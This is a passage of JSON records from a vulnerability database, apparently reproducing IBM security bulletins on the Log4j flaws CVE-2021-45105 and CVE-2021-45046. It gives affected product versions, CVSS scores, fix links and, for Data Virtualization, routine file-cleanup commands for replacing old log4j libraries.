and Adapter Container nodes: \n\n[`http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FOther+software%2FSterling+B2B+Integrator&fixids=B2Bi-windows-log4j-remediation&source=SAR`](<https://urldefense.com/v3/__http:/www.ibm.com/support/fixcentral/quickorder?product=ibm*2FOther*software*2FSterling*B2B*Integrator&fixids=B2Bi-windows-log4j-remediation&source=SAR__;JSslKys!!I6-MEfEZPA!Yanxte2R4h-EsVIYkKcQJv0i5mi2QTHWu86BAyOoPPPgXgLCzga6SGT4eCvBtG-AoQ2XNQ$>)\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-18T17:29:35", "type": "ibm", "title": "Security Bulletin: Apache Log4j Vulnerability Affects IBM Sterling B2B Integrator (CVE-2021-45105, CVE-2021-45046)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-02-18T17:29:35", "id": "BB96DF8C4863ECA5111B83DE1E5DBA4C67AC8E6999013404D8DD87C98CC7B60D", "href": "https://www.ibm.com/support/pages/node/6537664", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-23T17:57:55", "description": "## Summary\n\nApache Log4j is used by IBM Security Access Manager for Enterprise Single Sign-On as part of its logging infrastructure. IBM Security Access Manager for Enterprise Single Sign-On is vulnerable to denial of service and arbitrary code execution due to Apache Log4j (CVE-2021-45105 and CVE-2021-45046). The fix includes Apache Log4j v.2.17.1.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45105](<https://vulners.com/cve/CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-45046](<https://vulners.com/cve/CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \nIBM Security Access Manager for Enterprise Single-Sign On| 8.2.2 \n \n\n\n## Remediation/Fixes\n\nIBM strongly recommends addressing the vulnerability now by upgrading \n\nApply Fix Pack 12 on IBM Security Access Manager for Enterprise Single-Sign On version 8.2.2 as per the details available [here](<https://www.ibm.com/support/pages/node/6539792> \"here\" ). \n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-15T07:49:05", "type": "ibm", "title": "Security Bulletin: IBM Security Access Manager for Enterprise Single Sign-On is vulnerable to denial of service and arbitrary code execution due to Apache Log4j (CVE-2021-45105 and CVE-2021-45046)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-15T07:49:05", "id": "DC086AC7F5679D9F84A3DA8B91FAB9C0F09EF5EFB4C8687216156974F51B6283", "href": "https://www.ibm.com/support/pages/node/6541182", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-23T17:58:41", "description": "## Summary\n\nMultiple vulnerabilities in Apache Log4j could allow an attacker to execute arbitrary code and denial of service on the system. These vulnerabilities may affect IBM Spectrum Scale For IBM Elastic Storage Server because the library is used by the Graphical User Interface (GUI) of IBM Spectrum Scale. \n\n## Vulnerability Details\n\n**CVEID: **[CVE-2021-45105](<https://vulners.com/cve/CVE-2021-45105>) \n**DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n**CVEID: **[CVE-2021-45046](<https://vulners.com/cve/CVE-2021-45046>) \n**DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)** | **Version(s)** \n---|--- \nIBM Spectrum Scale for IBM Elastic Storage Server | \nV5.3.6.0 - V5.3.7.3 \nIBM Spectrum Scale for IBM Elastic Storage Server | V6.0.1.0 - V6.1.2.1 \n \n## Remediation/Fixes\n\n**IBM strongly recommends addressing the vulnerability by installing the Spectrum Scale for IBM ESS version specific efix:** **Product(s)** | **Remediation(s)** \n---|--- \nIBM Spectrum Scale for IBM Elastic Storage Server V5.3.6.0 - V5.3.7.3 \n\n| For the fix contact [IBM Support](<https://www.ibm.com/mysupport> \"IBM Support\" ) or [call](<https://www.ibm.com/docs/en/spectrum-scale/5.0.4?topic=center-how-contact-support> \"call\" ), reference** APAR IJ36851** \nIBM Spectrum Scale for IBM Elastic Storage Server V6.0.1.0 - V6.1.2.1 | \n\nFor the fix contact [IBM Support](<https://www.ibm.com/mysupport> \"IBM Support\" ) and or [call](<https://www.ibm.com/docs/en/spectrum-scale/5.0.4?topic=center-how-contact-support> \"call\" ), reference** APAR IJ36818** \n \n**Note**: Selected efixes are on Fix Central, see <https://www.ibm.com/support/pages/node/6537748>\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-31T15:29:42", "type": "ibm", "title": "Security Bulletin: Multiple vulnerabilities in Apache Log4j impact IBM Spectrum Scale for IBM Elastic Storage Server (CVE-2021-45105,CVE-2021-45046)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2021-12-31T15:29:42", "id": "980930D95C9061C71E85C435692629E07D952BA870609E55949143F9AA635712", "href": "https://www.ibm.com/support/pages/node/6537752", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-23T17:58:07", "description": "## Summary\n\nMultiple Apache Log4j vunerabilities impact Process Federation Server that is shipped with IBM Business Automation Workflow. This vulnerability includes Apache Log4j v2.17.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45105](<https://vulners.com/cve/CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-45046](<https://vulners.com/cve/CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \nIBM Business Automation Workflow| V21.0 \nV20.0 \nV19.0 \nV18.0 \n \n\n\n## Remediation/Fixes\n\nIBM strongly recommends addressing the vulnerability now applying the Interim Fix: \n\n[IBM Business Automation Workflow](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~WebSphere&product=ibm/WebSphere/IBM+Business+Automation+Workflow&release=All&platform=All&function=aparId&apars=JR64435>)\n\nFor more information regarding APAR: [JR64435](<https://www.ibm.com/support/docview.wss?uid=swg1JR64435> \"JR64435\" ). \n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-13T07:04:20", "type": "ibm", "title": "Security Bulletin: IBM Business Automation Workflow is vulnerable to denial of service and arbitrary code execution due to Apache Log4j (CVE-2021-45105 and CVE-2021-45046)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-13T07:04:20", "id": "A6B79EA77FF12E690D40F605757B18FA9561F56797862582866D9A26B345F82D", "href": "https://www.ibm.com/support/pages/node/6540542", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-23T17:35:24", "description": "## Summary\n\nIBM Maximo Application Suite - Monitor Component uses Apache Log4j which is vulnerable to CVE-2021-45105 and CVE-2021-45046.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45105](<https://vulners.com/cve/CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-45046](<https://vulners.com/cve/CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Maximo Application Suite - Monitor Component| 8.6.0-8.6.2, 8.7.0 \n \n\n\n## Remediation/Fixes\n\nAffected Product(s)| Fixpack Version(s) \n---|--- \nIBM Maximo Application Suite - Monitor Component| 8.6.3 or latest (available from the Catalog under Update Available) \nIBM Maximo Application Suite - Monitor Component| 8.7.1 or latest (available from the Catalog under Update Available) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2023-05-08T20:27:38", "type": "ibm", "title": "Security Bulletin: Apache Log4j is vulnerable to CVE-2021-45105 and CVE-2021-45046 used in IBM Maximo Application Suite - Monitor Component", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2023-05-08T20:27:38", "id": "F122C27179362A817F8CF31FDC2906DEDD7B8BBEA33D06FFA42180F0625D22E0", "href": "https://www.ibm.com/support/pages/node/6988975", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-23T17:58:07", "description": "## Summary\n\nThere are vulnerabilities in the Apache Log4j open source library. The library is used by IBM CloudPak foundational services which is a dependency of IBM WebSphere Automation for IBM Cloud Pak for Watson AIOps. The fix includes upgrade to Apache Log4j v2.17.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45105](<https://vulners.com/cve/CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-45046](<https://vulners.com/cve/CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \nIBM WebSphere Automation for IBM Cloud Pak for Watson AIOps| 1.2 \n \n\n\n## Remediation/Fixes\n\nIBM strongly recommends addressing the vulnerability now. The recommended solution involves a component of IBM WebSphere Automation for IBM Cloud Pak for Watson AIOps. The name of the component is IBM CloudPak foundational services (Events Operator). It is recommended to follow the instructions below. \n\nUpgrade to the latest IBM Cloud Pak foundational services release from the IBM Catalog. \n\n**Installing the IBM Cloud Pak foundational services online** \nRefer to the following documentation to perform an online installation:\n\n * [Installing IBM Cloud Pak foundational services online by using the console](<https://www.ibm.com/docs/en/cpfs?topic=314-installing-foundational-services-by-using-console>)\n * [Installing IBM Cloud Pak foundational services online by using the CLI](<https://www.ibm.com/docs/en/cpfs?topic=314-installing-foundational-services-by-using-cli>)\n\nIf the Approval Strategy is set to Automatic in the subscription, the operator will automatically update to the latest version. \nIf the Approval Strategy is set to Manual in the subscription, IBM Cloud Pak foundational services operator cannot be automatically installed or upgraded. For more information, see [Approval strategy](<https://www.ibm.com/docs/en/cpfs?topic=services-configuring-foundational-by-using-custom-resource#approval_strategy>). Update to the latest version. \n \n\n\n**Installing the IBM Cloud Pak foundational services in an air-gapped environment** \nRefer to the following documentation to perform an air-gapped installation:\n\n * [Installing in an air gap environment](<https://www.ibm.com/docs/en/ws-automation?topic=installing-in-air-gap-environment> \"Installing in an air gap environment\" )\n * Ensure that the following environment variable is used when downloading CASE files: \nexport CASE_VERSION=1.2.1\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-13T13:59:33", "type": "ibm", "title": "Security Bulletin: Due to Apache Log4j, IBM WebSphere Automation for IBM Cloud Pak for Watson AIOps is vulnerable to arbitrary code execution (CVE-2021-45046) and denial of service (CVE-2021-45105)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-13T13:59:33", "id": "09E2EB771A00246F88812FA7239EC135B4D760017A61975C9C7DFACAB2B566B3", "href": "https://www.ibm.com/support/pages/node/6540584", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-23T17:57:27", "description": "## Summary\n\nThere are vulnerabilities in the version of Apache Log4j that is used by IBM Data Virtualization on Cloud Pak for Data (CVE-2021-45046 and CVE-2021-45105) which is used for logging. The fix includes Apache Log4j 2.17.1.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45105](<https://vulners.com/cve/CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-45046](<https://vulners.com/cve/CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **DV Version(s) \n**| \n\n**CPD ****Version(s) ** \n \n---|---|--- \nIBM Data Virtualization(DV) on Cloud Pak for Data(CPD)| 1.3.0| 2.5.0 \nIBM Data Virtualization(DV) on Cloud Pak for Data(CPD)| 1.4.1| 3.0.1 \nIBM Data Virtualization(DV) on Cloud Pak for Data(CPD)| 1.5.0| \n\n3.5,\n\n3.5 Refresh 1 - 9 \n \nIBM Data Virtualization(DV) on Cloud Pak for Data(CPD)| 1.7.1 - 1.7.3| 4.0 Refresh 1 - 3 \nIBM Data Virtualization(DV) on Cloud Pak for Data(CPD)| 1.7.3| 4.0 Refresh 4 \n \n## Remediation/Fixes\n\n**IBM strongly recommends addressing the vulnerability now.**\n\n**Affected Product(s)**| **DV Version(s) **| **CPD Version(s) **| **Fixes** \n---|---|---|--- \nIBM Data Virtualization(DV) on Cloud Pak for Data(CPD)| 1.3.0| 2.5.0| \n\nUpgrade to version 1.5.0 patch version 1.5.0.0-270 (DV) /\n\n3.5 Refresh 10 (CPD) \n \nIBM Data Virtualization(DV) on Cloud Pak for Data(CPD)| 1.4.1| 3.0.1| \n\nUpgrade to version 1.5.0 patch version 1.5.0.0-270 (DV) /\n\n3.5 Refresh 10 (CPD) \n \nIBM Data Virtualization(DV) on Cloud Pak for Data(CPD)| 1.5.0| \n\n3.5,\n\n3.5 Refresh 1 - 9\n\n| \n\nApply patch version 1.5.0.0-270 (DV) /\n\n3.5 Refresh 10 (CPD) \n \nIBM Data Virtualization(DV) on Cloud Pak for Data(CPD)| 1.7.1 - 1.7.3| 4.0 Refresh 1 - 3| \n\nUpdate to version 1.7.5 (DV) /\n\n4.0 Refresh 5 (CPD) \n \nIBM Data Virtualization(DV) on Cloud Pak for Data(CPD)| 1.7.3| 4.0 Refresh 4| \n\nUpdate to version 1.7.5 (DV) /\n\n4.0 Refresh 5 (CPD) \n \n**You must update the Cloud Pak for Data platform to version 4.0 Refresh 5 to install the fix for Data Virtualization.**\n\nTo update Cloud Pak for Data platform to 4.0 Refresh 5, see the following links:\n\n * [Updating Data Virtualization from Version 3.5](<https://www.ibm.com/docs/SSQNUZ_4.0/svc-dv/dv-operator-upgrade-v35.html> \"Updating Data Virtualization from Version 3.5\" )\n * [Updating Data Virtualization from Version 4.0.1 or later](<https://www.ibm.com/docs/SSQNUZ_4.0/svc-dv/dv-operator-upgrade-v4.html>)\n\n**The following procedure covers the steps after installing the fix for Data Virtualization**.\n\n 1. Run the following steps from the Data Virtualization head pod to manually remove unnecessary files from your updated Data Virtualization instance. These include files that contained old log4j binaries. Not all of the files might be present if you previously installed other log4j fixes. \n\n 1. Log in to the Data Virtualization head pod. \n \n oc rsh c-db2u-dv-db2u-0\n\n 2. Switch to the db2inst1 user. \n \n su - db2inst1\n\n 3. Remove unnecessary JAR files. \n \n rm -rf /mnt/blumeta0/home/db2inst1/sqllib/datavirtualization/dvm_driver/log4j-api-2.8.2.jar /mnt/blumeta0/home/db2inst1/sqllib/datavirtualization/dvm_driver/log4j-core-2.8.2.jar /mnt/blumeta0/home/db2inst1/sqllib/datavirtualization/dvm_driver/log4j-api-2.15.0.jar /mnt/blumeta0/home/db2inst1/sqllib/datavirtualization/dvm_driver/log4j-core-2.15.0.jar /mnt/bludata0/dv/versioned/pre_migration/sqllib/datavirtualization/dvm_driver/log4j-api-2.8.2.jar /mnt/bludata0/dv/versioned/pre_migration/sqllib/datavirtualization/dvm_driver/log4j-core-2.8.2.jar /mnt/bludata0/dv/versioned/pre_migration/sqllib/datavirtualization/dvm_driver/log4j-api-2.15.0.jar /mnt/bludata0/dv/versioned/pre_migration/sqllib/datavirtualization/dvm_driver/log4j-core-2.15.0.jar\n \n ${BIGSQL_CLI_DIR}/BIGSQL/package/scripts/bigsqlPexec.sh -w -c \"rm -rf /mnt/blumeta0/home/db2inst1/sqllib/datavirtualization/dvm_driver/log4j-api-2.8.2.jar\"\n \n ${BIGSQL_CLI_DIR}/BIGSQL/package/scripts/bigsqlPexec.sh -w -c \"rm -rf /mnt/blumeta0/home/db2inst1/sqllib/datavirtualization/dvm_driver/log4j-core-2.8.2.jar\"\n \n ${BIGSQL_CLI_DIR}/BIGSQL/package/scripts/bigsqlPexec.sh -w -c \"rm -rf /mnt/blumeta0/home/db2inst1/sqllib/datavirtualization/dvm_driver/log4j-api-2.15.0.jar\"\n \n ${BIGSQL_CLI_DIR}/BIGSQL/package/scripts/bigsqlPexec.sh -w -c \"rm -rf /mnt/blumeta0/home/db2inst1/sqllib/datavirtualization/dvm_driver/log4j-core-2.15.0.jar\"\n\n 4. Remove unnecessary ZIP and TAR files. \n \n rm -rf /mnt/PV/versioned/uc_dsserver_shared/config/DATAVIRTUALIZATION_ENDPOINT_V1.7*.tar.gz /mnt/PV/versioned/uc_dsserver_shared/config/DATAVIRTUALIZATION_ENDPOINT_V1.7*.zip\n\n 5. Copy the latest TAR file. \n \n cp /opt/ibm/qp_artifacts/archives/DATAVIRTUALIZATION_ENDPOINT_V1.7.5_*.tar.gz /mnt/PV/versioned/uc_dsserver_shared/config\n\n 6. Copy the latest ZIP file. \n \n cp /opt/ibm/qp_artifacts/archives/DATAVIRTUALIZATION_ENDPOINT_V1.7.5_*.zip 